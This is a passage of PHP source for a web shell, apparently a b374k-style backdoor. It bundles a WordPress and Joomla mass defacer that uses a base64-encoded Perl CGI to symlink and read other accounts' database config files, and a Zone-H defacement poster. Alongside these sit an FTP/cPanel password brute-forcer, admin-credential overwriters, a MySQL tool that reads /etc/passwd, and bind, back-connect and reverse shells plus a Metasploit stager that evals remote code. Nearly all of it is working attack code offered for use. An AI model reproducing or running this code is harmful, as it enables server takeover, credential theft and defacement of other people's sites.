");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2 h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('//', $data, $match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '';echo '';$res = index_changer_joomla($config01, $def, $domain);echo '';if($res['cond']) {echo '';fwrite($output, 'http://'.$domain."
");$count1++;} else {echo '';}echo '';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '';echo '';$res = index_changer_wp($config02, $def);echo '';if($res['cond']) {echo '';fwrite($output, 'http://'.$domain."
");$count2++;} else {echo '';}echo '';}}echo '
IDSIDDomainTypeActionStatus
'.($j++).''.$i++.''.$domain.'JOOMLA'.$res['output'].'DEFACEDFAILED
'.($j++).''.$domain.'WORDPRESS'.$res['output'].'DEFACEDFAILED
';echo '
';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')
';echo 'View Total Defaced urls
';if($count1+$count2 > 0){echo 'Send to Zone-H';}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num

");$def = file_get_contents($def_url);$def = urlencode($def); $output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/data.txt', $_POST['man_data']);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('//', $data, $match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '';echo '';$res = index_changer_joomla($config01, $def, $domain);echo '';if($res['cond']) {echo '';fwrite($output, 'http://'.$domain."
");$count1++;} else {echo '';}echo '';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '';echo '';$res = index_changer_wp($config02, $def);echo '';if($res['cond']) {echo '';fwrite($output, 'http://'.$domain."
");$count2++;} else {echo '';}echo '';}}echo '
IDSIDDomainTypeActionStatus
'.($j++).''.($i++).''.$domain.'JOOMLA'.$res['output'].'DEFACEDFAILED
'.($j++).''.$domain.'WORDPRESS'.$res['output'].'DEFACEDFAILED
';echo '
';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')
';echo 'View Total Defaced urls
';if($count1+$count2 > 0){echo 'Send to Zone-H';}}echo '

Wordpress and Joomla Mass Defacer

';if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '
using /etc/named.conf ('.(is_readable('/etc/named.conf')?'READABLE':'NOT READABLE').')
using /etc/passwd ('.(is_readable('/etc/passwd')?'READABLE':'NOT READABLE').')
manual copy of /etc/passwd

index url:
';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }}if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }echo '';} elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){$defacer='ReZK2LL';$display_details=0;$method=14;$reason=5;error_reporting(0);set_time_limit(0);if(!function_exists('curl_init')){echo "CURL ERROR\n";exit;}$cli=(isset($argv[0]))?1:0;if($cli==1){$file=$argv[1];$sites=file($file);}if(function_exists(apache_setenv)){@apache_setenv('no-gzip', 1);}@ini_set('zlib.output_compression', 0);@ini_set('implicit_flush', 1);@ob_implicit_flush(true);@ob_end_flush();if(isset($_POST['domains'])){$sites=explode("\n",$_POST['domains']);}if (file_exists($_FILES["file"]["tmp_name"])){$file=$_FILES["file"]["tmp_name"];$sites=file($file);} echo <<

EOF;
if(!isset($_POST['defacer'])){
echo <<
Zone-H Poster
Defacer :
Domains:
 
OR
Submit form .txt file:




EOF;
}$defacer=$_POST['defacer'];if(!$sites){echo '
';exit;}$sites=array_unique(str_replace('http://','',$sites));$total=count($sites);echo "[+] Total unique domain: $total\n\n";$pause=10;$start=time();$main=curl_multi_init();for($m=0;$m<3;$m++){$http[] = curl_init();}for($n=0;$n<$total;$n +=30){if($display_details==1){for($x=0;$x<30;$x++){echo'[+] Adding '.rtrim($sites[$n+$x]).'';echo "\n";}}$d=$n+30;if($d>$total){$d=$total;}echo "=====================>[$d/$total]\n";for($w=0;$w<3;$w++){$p=$w * 10;if(!(isset($sites[$n+$p]))){$pause=$w;break;}$posts[$w]="defacer=$defacer&domain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($sites[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($sites[$n+$p+9])."&hackmode=".$method."&reason=".$reason."&submit=Send";$curlopt=array(CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16',CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_ENCODING => true,CURLOPT_HEADER => false,CURLOPT_HTTPHEADER => array("Keep-Alive: 7"),CURLOPT_CONNECTTIMEOUT => 3,CURLOPT_URL => 'http://www.zone-h.com/notify/mass',CURLOPT_POSTFIELDS => $posts[$w]);curl_setopt_array($http[$w],$curlopt);curl_multi_add_handle($main,$http[$w]);}$running = null;do{curl_multi_exec($main,$running);}while($running > 0);for($m=0;$m<3;$m++){if($pause==$m){break;}curl_multi_remove_handle($main, $http[$m]);$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);if ($code != 200) {while(true){echo' [-]Error!....Retrying';echo "\n";sleep(5);curl_exec($http[$m]);$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);if( $code== 200){break 1;}}}}}$end= time() - $start;echo 'Done';echo "\n\n[*]Time: $end seconds\n";curl_multi_close($main);if($cli==0){echo '';}exit;} elseif(isset($_GET['x']) && ($_GET['x'] == 'brute')){$connect_timeout=5; set_time_limit(0);$submit=$_REQUEST['submit'];$users=$_REQUEST['users'];$pass=$_REQUEST['passwords'];$target=$_REQUEST['target'];$cracktype=$_REQUEST['cracktype'];if($target == ""){$target = "localhost";}?>

Connection Timed out";exit;}elseif ( curl_errno($ch) == 0 ){print "
Username ($user) | Password ($pass)
";}curl_close($ch);}function cpanel_check($host,$user,$pass,$timeout){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "http://$host:2082");curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);curl_setopt($ch, CURLOPT_FAILONERROR, 1);$data = curl_exec($ch);if ( curl_errno($ch) == 28 ) {print "Connection Timed out";exit;}elseif ( curl_errno($ch) == 0 ){print "
[+]Username ($user) | Password ($pass)
";}curl_close($ch);}if(isset($submit) && !empty($submit)){if(empty($users) && empty($pass)){print "

Error : Check The Users and Password List

";exit;}if(empty($users)){print "

Error :Check The Users List

";exit;}if(empty($pass) ){print "

Error :Check The Password List

";exit;};$userlist=explode("\n",$users);$passlist=explode("\n",$pass);print "[~] Wait ...

";foreach ($userlist as $user) {$pureuser = trim($user);foreach ($passlist as $password ) {$purepass = trim($password);if($cracktype == "ftp"){ftp_check($target,$pureuser,$purepass,$connect_timeout);}if ($cracktype == "cpanel"){cpanel_check($target,$pureuser,$purepass,$connect_timeout);}}}} echo "

The Cracker


IP :

userspasswords

Cpanel(2082)Ftp (21)


";die();} elseif(isset($_GET['x']) && ($_GET['x'] == 'joomla')){if(empty($_POST['pwd'])){echo "


Joomla login changer




DB_Prefix :   host :   database :   username :   password :  
  
New Username:  

New Password:  

  
";}else {$prefix = $_POST['prefix'];$localhost = $_POST['localhost'];$database = $_POST['database'];$username = $_POST['username'];$password = $_POST['password'];$admin = $_POST['admin'];$pd = ($_POST["pwd"]);$pwd = md5($pd);@mysql_connect($localhost,$username,$password) or die (mysql_error());@mysql_select_db($database) or die (mysql_error());$SQL=@mysql_query("UPDATE ".$prefix."users SET username ='".$admin."' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_error());$SQL=@mysql_query("UPDATE ".$prefix."users SET password ='".$pwd."' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_error());if($SQL) echo "

Done... go and login

";}} elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){$sqlhost = $_GET['sqlhost'];$sqluser = $_GET['sqluser'];$sqlpass = $_GET['sqlpass'];$sqlport = $_GET['sqlport'];if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){$msg .= "
";$msg .= "

Connected to ".$sqluser."@".$sqlhost.":".$sqlport;$msg .= "  ->  [ databases ]";if(isset($_GET['db'])) $msg .= "  ->  ".htmlspecialchars($_GET['db'])."";if(isset($_GET['table'])) $msg .= "  ->  ".htmlspecialchars($_GET['table'])."";$msg .= "

version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."

";$msg .= "
";echo $msg;if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE '/etc/passwd'\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";$msg = "

";$tables = array();$msg .= "";$hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);} @sort($tables); foreach($tables as $table){$msg .= "";} $msg .= "
available tables on ".$db."
$table
";} elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db'];$table = $_GET['table'];$query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";$msgq = "

";$columns = array();$msg = "";$hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);while(list($column) = @mysql_fetch_row($hasil)){$msg .= "";$kolum = $column;}$msg .= "";$hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z'])) $page = (int) $_GET['z']; else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($page - 1) * $pagenum);$hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){$msg .= "";foreach($datas as $data){if(trim($data) == "") $data = " ";$msg .= "";}$msg .= "";} $msg .= "
$column
$data
";$head = "
Page
";$msg = $msgq.$head.$msg;} elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){$db = $_GET['db'];$query = magicboom($_GET['sqlquery']); $msg = "

";@mysql_select_db($db);$querys = explode(";",$query);foreach($querys as $query){if(trim($query) != ""){$hasil = mysql_query($query); if($hasil){$msg .= "

".$query.";   [ ok ]

";$msg .= ""; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "";$msg .= "";for($i=0;$i<@mysql_num_rows($hasil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= "";for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j];$msg .= "";} $msg .= "";} $msg .= "
".htmlspecialchars(@mysql_field_name($hasil,$i))."
".$dataz."
";} else $msg .= "

".$query.";   [ error ]

";} } } else {$query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";$msg = "

";$dbs = array();$msg .= "";$hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);} @sort($dbs);foreach($dbs as $db){ $msg .= "";} $msg .= "
available databases
$db
";} @mysql_close($con);} else $msg = "

can't connect

";echo $msg;} else{?>

MySQL Connect

Connection Form
  Host
  Username
  Password
  Port 


Configs Grabber


/etc/passwd content




Symlink is disabled :( ');}@mkdir('configs', 0755);@chdir('configs');$htaccess=" Options all Options +Indexes Options +FollowSymLinks DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any ";file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];$passwd=explode("\n",$passwd);echo "
wait ...
";foreach($passwd as $pwd){$pawd=explode(":",$pwd);$user =$pawd[0];@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');@symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');@symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'-wp13-wordpress-beta.txt');@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');@symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'-wp-protal.txt');@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');@symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-wp-test.txt');@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');@symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'-joomla-protal.txt');@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');@symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');@symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');@symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}echo 'Done -> configs';}} elseif(isset($_GET['x']) && ($_GET['x'] == 'config')){ error_reporting(0);if ($_POST['kill']) {$url = $_POST['url'];$user = $_POST['user'];$pass =$_POST['pass'];$pss = md5($pass);function enter($text,$a,$b){$explode = explode($a,$text);$explode = explode($b,$explode[1]);return $explode[0];}$config = file_get_contents($url);$password = enter($config,"define('DB_PASSWORD', '","');");$username = enter($config,"define('DB_USER', '","');");$db = enter($config,"define('DB_NAME', '","');");$prefix = enter($config,'$table_prefix = \'',"';");$host = enter($config,"define('DB_HOST', '","');");if($config && preg_match('/DB_NAME/i',$config)){$conn= @mysql_connect($host,$username ,$password ) or die ("i can't connect to mysql, check your data");@mysql_select_db($db,$conn) or die (mysql_error());$grab = @mysql_query("SELECT * from `wp_options` WHERE option_name='home'");$data = @mysql_fetch_array($grab);$site_url = $data["option_value"];$query = mysql_query("UPDATE `".$prefix."users` SET `user_login` = '".$user."',`user_pass` = '".$pss."' WHERE `ID` = 1");if ($query) {echo '

Done !


siteuserpasswordlink
'.$site_url.''.$user.''.$pass.'login
';} else echo '

ERROR !

';} else die('

Not a wordpress config

');} else { ?>


Wordpress login changer ( symlink version )



config link : 
new user : 
new password : 


Domains and Users

";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("
Error : i can't read [ /etc/named.conf ]
");}echo '';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "";flush();}}}echo'';} elseif(isset($_GET['x']) && ($_GET['x'] == 'keyboard')){if(empty($_POST['pwd'])){echo "

Wordpress login changer

DB_Prefix :   host :   database :   username :   password :   

New username :

New password :
  
";}else{$prefix = $_POST['prefix'];$localhost = $_POST['localhost'];$database= $_POST['database'];$username= $_POST['username'];$password= $_POST['password'];$pwd= $_POST['pwd'];$admin= $_POST['admin'];@mysql_connect($localhost,$username,$password) or die(mysql_error());@mysql_select_db($database) or die(mysql_error());$hash = crypt($pwd);$grab = @mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = @mysql_fetch_array($grab);$site_url=$data["option_value"];$k2=@mysql_query("UPDATE ".$prefix."users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());$k2=@mysql_query("UPDATE ".$prefix."users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());if($k2){echo '

Done ... -> Login

';}}echo '';} elseif(isset($_GET['x']) && ($_GET['x'] == 'string')){$text = $_POST['code'];?>


String encoder




 '.$codi.'
';} elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){@ob_start();@eval("phpinfo();");$buff = @ob_get_contents();@ob_end_clean();$awal = strpos($buff,"")+6;$akhir = strpos($buff,"");echo "
".substr($buff,$awal,$akhir-$awal)."
";} elseif(isset($_GET['view']) && ($_GET['view'] != "")){if(is_file($_GET['view'])){if(!isset($file))$file = magicboom($_GET['view']);if(!$win && $posix){$name=@posix_getpwuid(@fileowner($file));$group=@posix_getgrgid(@filegroup($file));$owner = $name['name']." : ".$group['name'];} else {$owner = $user;}$filn = basename($file);echo "
Domainsusers
".$domains[1][0]."".$user['name']."
Filename".$file."
Size".ukuran($file)."
Permission".get_perms($file)."
Owner".$owner."
Create time".date("d-M-Y H:i",@filectime($file))."
Last modified".date("d-M-Y H:i",@filemtime($file))."
Last accessed".date("d-M-Y H:i",@fileatime($file))."
Actionsedit | rename | delete | download (gzip)
Viewtext | code | image
"; if(isset($_GET['type']) && ($_GET['type']=='image')){echo "
";} elseif(isset($_GET['type']) && ($_GET['type']=='code')){echo "
";$file = wordwrap(@file_get_contents($file),"240","\n");@highlight_string($file);echo "
";} else {echo "
";echo nl2br(htmlentities((@file_get_contents($file))));echo "
";}}elseif(is_dir($_GET['view'])){echo showdir($pwd,$prompt);}} elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){if(isset($_POST['save'])){$file = $_POST['saveas'];$content = magicboom($_POST['content']);if($filez = @fopen($file,"w")){$time = date("d-M-Y H:i",time());if(@fwrite($filez,$content)) $msg = "file saved @ ".$time;else $msg = "failed to save";@fclose($filez);}else $msg = "permission denied";}if(!isset($file))$file = $_GET['edit'];if($filez = @fopen($file,"r")){$content = ""; while(!feof($filez)){$content .= htmlentities(str_replace("''","'",fgets($filez)));} @fclose($filez);}?>
Save as  


Upload Files To The Server

Local

 

Remote
link
Process successed

";} else {$msg = "

Process Failed

";}} elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {$port = trim($_POST['port']);$passwrd = trim($_POST['bind_pass']);tulis("bdp",$port_bind_bd_pl);exe("chmod 777 bdp");$p2=which("perl");exe($p2." bdp ".$port." &");$scan = exe("ps aux");if(eregi("$p2 bdp $port",$scan)){$msg = "

Process successed

";} else {$msg = "

Process Failed

";} } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {$ip = trim($_POST['ip']);$port = trim($_POST['backport']);tulis("bcc.c",$back_connect_c);exe("gcc -o bcc bcc.c");exe("chmod 777 bcc");@unlink("bcc.c");exe("./bcc ".$ip." ".$port." &");$msg = "trying to connect to ".$ip." on port ".$port." ...";} elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']);$port = trim($_POST['backport']);tulis("bcp",$back_connect); exe("chmod +x bcp");$p2=which("perl");exe($p2." bcp ".$ip." ".$port." &"); $msg = "Trying to connect to ".$ip." on port ".$port." ...";} elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) {$pilihan = trim($_POST['pilihan']);$wurl = trim($_POST['wurl']);$namafile = download($pilihan,$wurl); if(is_file($namafile)){$msg = exe($wcmd);} else $msg = "error: file not found $namafile";}?>



Bind PortBack connectdownload and Exec
Port
Password
Use
IP">
Port
Use
url
cmd

Reverse shell ( php )

Your IP
Port

Metasploit Connection

Your IP
Port
"; echo $s_result; if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case 'socket': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a['len'];$buffer = '';while (strlen($buffer) < $len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}} if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']); if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']); if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork(); if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;} umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1); $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if(!is_resource($process)) exit(1); stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], 